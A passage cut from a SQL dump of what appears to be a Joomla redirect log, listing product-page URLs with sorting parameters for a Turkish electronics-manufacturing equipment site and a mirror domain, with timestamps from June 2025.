00:00:00',301),(42808,'http://www.3s-technologies.com.tr/tr/urunler/b?lgesel-lehimleme/by,pc.ordering,product_name/dirdesc',NULL,'','',1,0,'2025-06-29 23:55:39','0000-00-00 00:00:00',301),(42809,'http://www.3s-technologies.com.tr/tr/urunler/b?lgesel-lehimleme/by,product_name',NULL,'','',1,0,'2025-06-29 23:55:41','0000-00-00 00:00:00',301),(42810,'http://www.3s-technologies.com.tr/tr/urunler/b?lgesel-lehimleme/by,product_name/dirdesc',NULL,'','',1,0,'2025-06-29 23:55:43','0000-00-00 00:00:00',301),(42811,'http://www.3s-technologies.com.tr/tr/urunler/b?lgesel-lehimleme/by,product_sku',NULL,'','',1,0,'2025-06-29 23:55:45','0000-00-00 00:00:00',301),(42812,'http://www.3s-technologies.com.tr/tr/urunler/b?lgesel-lehimleme/dirdesc',NULL,'','',1,0,'2025-06-29 23:55:47','0000-00-00 00:00:00',301),(42813,'http://www.3s-technologies.com.tr/tr/urunler/b?lgesel-lehimleme/ess-310-24-detail',NULL,'','',1,0,'2025-06-29 23:55:49','0000-00-00 00:00:00',301),(42814,'http://www.3s-technologies.com.tr/tr/urunler/b?lgesel-lehimleme/ess-310-24-detail/askquestion?tmpl=component',NULL,'','',1,0,'2025-06-29 23:55:50','0000-00-00 00:00:00',301),(42815,'http://www.3s-technologies.com.tr/tr/urunler/b?lgesel-lehimleme/ess-310-detail',NULL,'','',1,0,'2025-06-29 23:55:52','0000-00-00 00:00:00',301),(42816,'http://www.3s-technologies.com.tr/tr/urunler/b?lgesel-lehimleme/ess-310-detail/askquestion?tmpl=component',NULL,'','',1,0,'2025-06-29 23:55:54','0000-00-00 00:00:00',301),(42817,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/?ubuk-lehim',NULL,'','',1,0,'2025-06-29 23:55:56','0000-00-00 00:00:00',301),(42818,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/?ubuk-lehim/by,`p`.product_sku',NULL,'','',1,0,'2025-06-29 23:55:58','0000-00-00 00:00:00',301),(42819,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/?ubuk-lehim/by,`p`.product_sku/dirdesc',NULL,'','',1,0,'2025-06-29 23:56:00','0000-00-00 00:00:00',301),(42820,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/?ubuk-lehim/by,category_name',NULL,'','',1,0,'2025-06-29 23:56:02','0000-00-00 00:00:00',301),(42821,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/?ubuk-lehim/by,category_name/dirdesc',NULL,'','',1,0,'2025-06-29 23:56:03','0000-00-00 00:00:00',301),(42822,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/?ubuk-lehim/by,mf_name',NULL,'','',1,0,'2025-06-29 23:56:05','0000-00-00 00:00:00',301),(42823,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/?ubuk-lehim/by,mf_name/dirdesc',NULL,'','',1,0,'2025-06-29 23:56:07','0000-00-00 00:00:00',301),(42824,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/?ubuk-lehim/by,ordering',NULL,'','',1,0,'2025-06-29 23:56:09','0000-00-00 00:00:00',301),(42825,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/?ubuk-lehim/by,pc.ordering,product_name',NULL,'','',1,0,'2025-06-29 23:56:11','0000-00-00 00:00:00',301),(42826,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/?ubuk-lehim/by,pc.ordering,product_name/dirdesc',NULL,'','',1,0,'2025-06-29 23:56:13','0000-00-00 00:00:00',301),(42827,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/?ubuk-lehim/by,product_name',NULL,'','',1,0,'2025-06-29 23:56:14','0000-00-00 00:00:00',301),(42828,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/?ubuk-lehim/by,product_name/dirdesc',NULL,'','',1,0,'2025-06-29 23:56:16','0000-00-00 00:00:00',301),(42829,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/?ubuk-lehim/by,product_sku',NULL,'','',1,0,'2025-06-29 23:56:18','0000-00-00 00:00:00',301),(42830,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/?ubuk-lehim/dirdesc',NULL,'','',1,0,'2025-06-29 23:56:20','0000-00-00 00:00:00',301),(42831,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/smd-f?r??n',NULL,'','',1,0,'2025-06-29 23:56:22','0000-00-00 00:00:00',301),(42832,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/smd-f?r??n/by,`p`.product_sku',NULL,'','',1,0,'2025-06-29 23:56:23','0000-00-00 00:00:00',301),(42833,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/smd-f?r??n/by,`p`.product_sku/dirdesc',NULL,'','',1,0,'2025-06-29 23:56:25','0000-00-00 00:00:00',301),(42834,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/smd-f?r??n/by,category_name',NULL,'','',1,0,'2025-06-29 23:56:27','0000-00-00 00:00:00',301),(42835,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/smd-f?r??n/by,category_name/dirdesc',NULL,'','',1,0,'2025-06-29 23:56:29','0000-00-00 00:00:00',301),(42836,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/smd-f?r??n/by,mf_name',NULL,'','',1,0,'2025-06-29 23:56:31','0000-00-00 00:00:00',301),(42837,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/smd-f?r??n/by,mf_name/dirdesc',NULL,'','',1,0,'2025-06-29 23:56:33','0000-00-00 00:00:00',301),(42838,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/smd-f?r??n/by,ordering',NULL,'','',1,0,'2025-06-29 23:56:34','0000-00-00 00:00:00',301),(42839,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/smd-f?r??n/by,pc.ordering,product_name',NULL,'','',1,0,'2025-06-29 23:56:36','0000-00-00 00:00:00',301),(42840,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/smd-f?r??n/by,pc.ordering,product_name/dirdesc',NULL,'','',1,0,'2025-06-29 23:56:38','0000-00-00 00:00:00',301),(42841,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/smd-f?r??n/by,product_name',NULL,'','',1,0,'2025-06-29 23:56:40','0000-00-00 00:00:00',301),(42842,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/smd-f?r??n/by,product_name/dirdesc',NULL,'','',1,0,'2025-06-29 23:56:42','0000-00-00 00:00:00',301),(42843,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/smd-f?r??n/by,product_sku',NULL,'','',1,0,'2025-06-29 23:56:44','0000-00-00 00:00:00',301),(42844,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/smd-f?r??n/dirdesc',NULL,'','',1,0,'2025-06-29 23:56:46','0000-00-00 00:00:00',301),(42845,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-orta-h?zl??',NULL,'','',1,0,'2025-06-29 23:56:47','0000-00-00 00:00:00',301),(42846,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-orta-h?zl??/by,`p`.product_sku',NULL,'','',1,0,'2025-06-29 23:56:49','0000-00-00 00:00:00',301),(42847,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-orta-h?zl??/by,`p`.product_sku/dirdesc',NULL,'','',1,0,'2025-06-29 23:56:51','0000-00-00 00:00:00',301),(42848,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-orta-h?zl??/by,pc.ordering,product_name/dirdesc',NULL,'','',1,0,'2025-06-29 23:56:53','0000-00-00 00:00:00',301),(42849,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-orta-h?zl??/by,product_name',NULL,'','',1,0,'2025-06-29 23:56:55','0000-00-00 00:00:00',301),(42850,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-orta-h?zl??/by,product_name/dirdesc',NULL,'','',1,0,'2025-06-29 23:56:57','0000-00-00 00:00:00',301),(42851,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-orta-h?zl??/by,product_sku',NULL,'','',1,0,'2025-06-29 23:56:59','0000-00-00 00:00:00',301),(42852,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-orta-h?zl??/dirdesc',NULL,'','',1,0,'2025-06-29 23:57:01','0000-00-00 00:00:00',301),(42853,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-ultra-h?z',NULL,'','',1,0,'2025-06-29 23:57:02','0000-00-00 00:00:00',301),(42854,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-ultra-h?z/by,`p`.product_sku',NULL,'','',1,0,'2025-06-29 23:57:04','0000-00-00 00:00:00',301),(42855,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/smd-f??n/by,product_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-30 01:29:01','0000-00-00 00:00:00',301),(42856,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/smd-f??n/by,product_sku?language=en-gb',NULL,'','',1,0,'2025-06-30 03:13:22','0000-00-00 00:00:00',301),(42857,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-ultra-h?z/by,ordering',NULL,'','',1,0,'2025-06-30 03:51:27','0000-00-00 00:00:00',301),(42858,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-orta-h?zl??/by,mf_name',NULL,'','',1,0,'2025-06-30 03:51:29','0000-00-00 00:00:00',301),(42859,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/smd-f??n/dirdesc',NULL,'','',1,0,'2025-06-30 04:30:19','0000-00-00 00:00:00',301),(42860,'https://3s-technologies.com.tr/index.php/en/products/smd-f??n/by,mf_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-30 04:48:31','0000-00-00 00:00:00',301),(42861,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/smd-f??n/by,product_name?language=en-gb',NULL,'','',1,0,'2025-06-30 05:39:42','0000-00-00 00:00:00',301),(42862,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/smd-f??n/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-30 06:08:12','0000-00-00 00:00:00',301),(42863,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/smd-f??n?language=en-gb',NULL,'','',1,0,'2025-06-30 07:09:17','0000-00-00 00:00:00',301),(42864,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/mirae/smd-orta-h??',NULL,'','',1,0,'2025-06-30 07:49:55','0000-00-00 00:00:00',301),(42865,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/mirae/smd-orta-h??/by,`p`.product_sku?language=en-gb',NULL,'','',1,0,'2025-06-30 08:22:45','0000-00-00 00:00:00',301),(42866,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/mirae/smd-orta-h??/by,category_name?language=en-gb',NULL,'','',1,0,'2025-06-30 08:46:33','0000-00-00 00:00:00',301),(42867,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/mirae/smd-orta-h??/by,mf_name?language=en-gb',NULL,'','',1,0,'2025-06-30 09:19:47','0000-00-00 00:00:00',301),(42868,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/mirae/smd-orta-h??/by,product_name?language=en-gb',NULL,'','',1,0,'2025-06-30 09:52:56','0000-00-00 00:00:00',301),(42869,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/aluminyum-i?leme-aluminum-processing',NULL,'','',1,0,'2025-06-30 09:53:08','0000-00-00 00:00:00',301),(42870,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/b?lgesel-lehimleme',NULL,'','',1,0,'2025-06-30 09:54:23','0000-00-00 00:00:00',301),(42871,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/b?lgesel-lehimleme/by,`p`.product_sku',NULL,'','',1,0,'2025-06-30 09:54:25','0000-00-00 00:00:00',301),(42872,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/b?lgesel-lehimleme/by,`p`.product_sku/dirdesc',NULL,'','',1,0,'2025-06-30 09:54:26','0000-00-00 00:00:00',301),(42873,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/b?lgesel-lehimleme/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-30 09:54:28','0000-00-00 00:00:00',301),(42874,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/b?lgesel-lehimleme/by,`p`.product_sku?language=en-gb',NULL,'','',1,0,'2025-06-30 09:54:30','0000-00-00 00:00:00',301),(42875,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/b?lgesel-lehimleme/by,category_name',NULL,'','',1,0,'2025-06-30 09:54:32','0000-00-00 00:00:00',301),(42876,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/b?lgesel-lehimleme/by,category_name/dirdesc',NULL,'','',1,0,'2025-06-30 09:54:33','0000-00-00 00:00:00',301),(42877,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/b?lgesel-lehimleme/by,category_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-30 09:54:35','0000-00-00 00:00:00',301),(42878,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/b?lgesel-lehimleme/by,mf_name',NULL,'','',1,0,'2025-06-30 09:54:38','0000-00-00 00:00:00',301),(42879,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/b?lgesel-lehimleme/by,mf_name/dirdesc',NULL,'','',1,0,'2025-06-30 09:54:39','0000-00-00 00:00:00',301),(42880,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/b?lgesel-lehimleme/by,mf_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-30 09:54:41','0000-00-00 00:00:00',301),(42881,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/b?lgesel-lehimleme/by,mf_name?language=en-gb',NULL,'','',1,0,'2025-06-30 09:54:43','0000-00-00 00:00:00',301),(42882,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/b?lgesel-lehimleme/by,ordering',NULL,'','',1,0,'2025-06-30 09:54:45','0000-00-00 00:00:00',301),(42883,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/b?lgesel-lehimleme/by,ordering?language=en-gb',NULL,'','',1,0,'2025-06-30 09:54:46','0000-00-00 00:00:00',301),(42884,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/b?lgesel-lehimleme/by,pc.ordering,product_name',NULL,'','',1,0,'2025-06-30 09:54:48','0000-00-00 00:00:00',301),(42885,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/b?lgesel-lehimleme/by,pc.ordering,product_name/dirdesc',NULL,'','',1,0,'2025-06-30 09:54:50','0000-00-00 00:00:00',301),(42886,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/b?lgesel-lehimleme/by,pc.ordering,product_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-30 09:54:51','0000-00-00 00:00:00',301),(42887,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/b?lgesel-lehimleme/by,pc.ordering,product_name?language=en-gb',NULL,'','',1,0,'2025-06-30 09:54:53','0000-00-00 00:00:00',301),(42888,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/b?lgesel-lehimleme/by,product_name',NULL,'','',1,0,'2025-06-30 09:54:55','0000-00-00 00:00:00',301),(42889,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/b?lgesel-lehimleme/by,product_name/dirdesc',NULL,'','',1,0,'2025-06-30 09:54:57','0000-00-00 00:00:00',301),(42890,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/b?lgesel-lehimleme/by,product_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-30 09:54:59','0000-00-00 00:00:00',301),(42891,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/b?lgesel-lehimleme/by,product_name?language=en-gb',NULL,'','',1,0,'2025-06-30 09:55:00','0000-00-00 00:00:00',301),(42892,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/b?lgesel-lehimleme/by,product_sku',NULL,'','',1,0,'2025-06-30 09:55:02','0000-00-00 00:00:00',301),(42893,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/b?lgesel-lehimleme/by,product_sku?language=en-gb',NULL,'','',1,0,'2025-06-30 09:55:04','0000-00-00 00:00:00',301),(42894,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/b?lgesel-lehimleme/dirdesc',NULL,'','',1,0,'2025-06-30 09:55:05','0000-00-00 00:00:00',301),(42895,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/b?lgesel-lehimleme/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-30 09:55:07','0000-00-00 00:00:00',301),(42896,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/b?lgesel-lehimleme/ess-310-24-detail',NULL,'','',1,0,'2025-06-30 09:55:09','0000-00-00 00:00:00',301),(42897,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/b?lgesel-lehimleme/ess-310-24-detail/askquestion?tmpl=component',NULL,'','',1,0,'2025-06-30 09:55:11','0000-00-00 00:00:00',301),(42898,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/b?lgesel-lehimleme/ess-310-detail',NULL,'','',1,0,'2025-06-30 09:55:13','0000-00-00 00:00:00',301),(42899,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/b?lgesel-lehimleme/ess-310-detail/askquestion?tmpl=component',NULL,'','',1,0,'2025-06-30 09:55:14','0000-00-00 00:00:00',301),(42900,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/b?lgesel-lehimleme?language=en-gb',NULL,'','',1,0,'2025-06-30 09:55:16','0000-00-00 00:00:00',301),(42901,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/???ubuk-lehim',NULL,'','',1,0,'2025-06-30 09:55:18','0000-00-00 00:00:00',301),(42902,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/?ubuk-lehim',NULL,'','',1,0,'2025-06-30 09:55:20','0000-00-00 00:00:00',301),(42903,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/?ubuk-lehim/by,`p`.product_sku',NULL,'','',1,0,'2025-06-30 09:55:21','0000-00-00 00:00:00',301),(42904,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-d???k-h??zl??/cs40-detail',NULL,'','',1,0,'2025-06-30 10:29:54','0000-00-00 00:00:00',301),(42905,'http://3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-orta-h?zl??/by,category_name',NULL,'','',1,0,'2025-06-30 12:46:14','0000-00-00 00:00:00',301),(42906,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/mirae/smd-ultra-h?z',NULL,'','',1,0,'2025-06-30 13:19:45','0000-00-00 00:00:00',301),(42907,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/mirae/smd-ultra-h?language=en-gb',NULL,'','',2,0,'2025-06-30 13:52:33','0000-00-00 00:00:00',301),(42908,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/smd-orta-h?zl??/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-30 13:56:59','0000-00-00 00:00:00',301),(42909,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/smd-orta-h?zl???language=en-gb',NULL,'','',1,0,'2025-06-30 13:57:00','0000-00-00 00:00:00',301),(42910,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/smd-ultra-h?z',NULL,'','',1,0,'2025-06-30 13:57:02','0000-00-00 00:00:00',301),(42911,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/smd-ultra-h?z/by,`p`.product_sku',NULL,'','',1,0,'2025-06-30 13:57:04','0000-00-00 00:00:00',301),(42912,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/smd-ultra-h?z/by,`p`.product_sku/dirdesc',NULL,'','',1,0,'2025-06-30 13:57:06','0000-00-00 00:00:00',301),(42913,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/smd-ultra-h?z/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-30 13:57:08','0000-00-00 00:00:00',301),(42914,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/smd-ultra-h?z/by,`p`.product_sku?language=en-gb',NULL,'','',1,0,'2025-06-30 13:57:10','0000-00-00 00:00:00',301),(42915,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/smd-ultra-h?z/by,category_name',NULL,'','',1,0,'2025-06-30 13:57:12','0000-00-00 00:00:00',301),(42916,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/smd-ultra-h?z/by,category_name/dirdesc',NULL,'','',1,0,'2025-06-30 13:57:13','0000-00-00 00:00:00',301),(42917,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/smd-ultra-h?z/by,category_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-30 13:57:15','0000-00-00 00:00:00',301),(42918,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/smd-ultra-h?z/by,category_name?language=en-gb',NULL,'','',1,0,'2025-06-30 13:57:17','0000-00-00 00:00:00',301),(42919,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/smd-ultra-h?z/by,mf_name',NULL,'','',1,0,'2025-06-30 13:57:19','0000-00-00 00:00:00',301),(42920,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/smd-ultra-h?z/by,mf_name/dirdesc',NULL,'','',1,0,'2025-06-30 13:57:21','0000-00-00 00:00:00',301),(42921,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/smd-ultra-h?z/by,mf_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-30 13:57:23','0000-00-00 00:00:00',301),(42922,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/smd-ultra-h?z/by,mf_name?language=en-gb',NULL,'','',1,0,'2025-06-30 13:57:24','0000-00-00 00:00:00',301),(42923,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/smd-ultra-h?z/by,pc.ordering,product_name',NULL,'','',1,0,'2025-06-30 13:57:26','0000-00-00 00:00:00',301),(42924,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/smd-ultra-h?z/by,pc.ordering,product_name/dirdesc',NULL,'','',1,0,'2025-06-30 13:57:28','0000-00-00 00:00:00',301),(42925,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/smd-ultra-h?z/by,pc.ordering,product_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-30 13:57:30','0000-00-00 00:00:00',301),(42926,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/smd-ultra-h?z/by,pc.ordering,product_name?language=en-gb',NULL,'','',1,0,'2025-06-30 13:57:32','0000-00-00 00:00:00',301),(42927,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/smd-ultra-h?z/by,product_name',NULL,'','',1,0,'2025-06-30 13:57:34','0000-00-00 00:00:00',301),(42928,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/smd-ultra-h?z/by,product_name/dirdesc',NULL,'','',1,0,'2025-06-30 13:57:35','0000-00-00 00:00:00',301),(42929,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/smd-ultra-h?z/by,product_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-30 13:57:37','0000-00-00 00:00:00',301),(42930,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/smd-ultra-h?z/by,product_name?language=en-gb',NULL,'','',1,0,'2025-06-30 13:57:39','0000-00-00 00:00:00',301),(42931,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/smd-ultra-h?z/dirdesc',NULL,'','',1,0,'2025-06-30 13:57:41','0000-00-00 00:00:00',301),(42932,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/smd-ultra-h?z/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-30 13:57:43','0000-00-00 00:00:00',301),(42933,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/smd-ultra-h?z?language=en-gb',NULL,'','',1,0,'2025-06-30 13:57:44','0000-00-00 00:00:00',301),(42934,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/tolo/smd-f?r??n',NULL,'','',1,0,'2025-06-30 13:57:46','0000-00-00 00:00:00',301),(42935,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/tolo/smd-f?r??n/by,`p`.product_sku',NULL,'','',1,0,'2025-06-30 13:57:48','0000-00-00 00:00:00',301),(42936,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/tolo/smd-f?r??n/by,`p`.product_sku/dirdesc',NULL,'','',1,0,'2025-06-30 13:57:50','0000-00-00 00:00:00',301),(42937,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/tolo/smd-f?r??n/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-30 13:57:52','0000-00-00 00:00:00',301),(42938,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/tolo/smd-f?r??n/by,`p`.product_sku?language=en-gb',NULL,'','',1,0,'2025-06-30 13:57:53','0000-00-00 00:00:00',301),(42939,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/tolo/smd-f?r??n/by,category_name',NULL,'','',1,0,'2025-06-30 13:57:55','0000-00-00 00:00:00',301),(42940,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/tolo/smd-f?r??n/by,category_name/dirdesc',NULL,'','',1,0,'2025-06-30 13:57:57','0000-00-00 00:00:00',301),(42941,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/tolo/smd-f?r??n/by,category_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-30 13:57:59','0000-00-00 00:00:00',301),(42942,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/tolo/smd-f?r??n/by,category_name?language=en-gb',NULL,'','',1,0,'2025-06-30 13:58:00','0000-00-00 00:00:00',301),(42943,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/tolo/smd-f?r??n/by,mf_name',NULL,'','',1,0,'2025-06-30 13:58:02','0000-00-00 00:00:00',301),(42944,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/tolo/smd-f?r??n/by,mf_name/dirdesc',NULL,'','',1,0,'2025-06-30 13:58:04','0000-00-00 00:00:00',301),(42945,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/tolo/smd-f?r??n/by,mf_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-30 13:58:06','0000-00-00 00:00:00',301),(42946,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/tolo/smd-f?r??n/by,mf_name?language=en-gb',NULL,'','',1,0,'2025-06-30 13:58:08','0000-00-00 00:00:00',301),(42947,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/tolo/smd-f?r??n/by,ordering',NULL,'','',1,0,'2025-06-30 13:58:10','0000-00-00 00:00:00',301),(42948,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/tolo/smd-f?r??n/by,ordering?language=en-gb',NULL,'','',1,0,'2025-06-30 13:58:11','0000-00-00 00:00:00',301),(42949,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/tolo/smd-f?r??n/by,pc.ordering,product_name',NULL,'','',1,0,'2025-06-30 13:58:13','0000-00-00 00:00:00',301),(42950,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/tolo/smd-f?r??n/by,pc.ordering,product_name/dirdesc',NULL,'','',1,0,'2025-06-30 13:58:15','0000-00-00 00:00:00',301),(42951,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/tolo/smd-f?r??n/by,pc.ordering,product_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-30 13:58:17','0000-00-00 00:00:00',301),(42952,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/tolo/smd-f?r??n/by,pc.ordering,product_name?language=en-gb',NULL,'','',1,0,'2025-06-30 13:58:18','0000-00-00 